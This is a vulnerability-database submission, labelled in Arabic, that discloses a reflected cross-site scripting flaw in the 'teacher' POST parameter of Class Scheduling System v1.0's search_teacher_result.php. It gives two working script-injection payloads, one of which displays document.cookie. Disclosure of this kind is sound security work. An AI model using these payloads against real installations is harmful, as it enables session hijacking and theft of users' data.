| عنوان | Class Scheduling System v1.0 /online_class_scheduling_system/search_teacher_result.php post parameter teacher exists reflected cross site scripting vulnerability |
|---|
| الوصف | Class Scheduling System v1.0 has reflected cross site scripting vulnerability.
Vulnerability File: /online_class_scheduling_system/search_teacher_result.php
Parameter "teacher" (POST), exists reflected cross site scripting vulnerability
Payload1:teacher=--><script>alert(996)</script>&semester=2nd&sy=2012-2013&save=
Payload2:teacher=--><script>alert(document.cookie)</script>&semester=2nd&sy=2012-2013&save= |
|---|
| المصدر | ⚠️ https://github.com/joicygiore/ApplyForCVE/blob/main/XSS.md |
|---|
| المستخدم | joicygiore (UID 47243) |
|---|
| ارسال | 21/05/2023 06:27 AM (3 سنوات منذ) |
|---|
| الاعتدال | 21/05/2023 08:56 AM (2 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 229612 [SourceCodester Class Scheduling System 1.0 POST Parameter search_teacher_result.php teacher البرمجة عبر المواقع] |
|---|
| النقاط | 20 |
|---|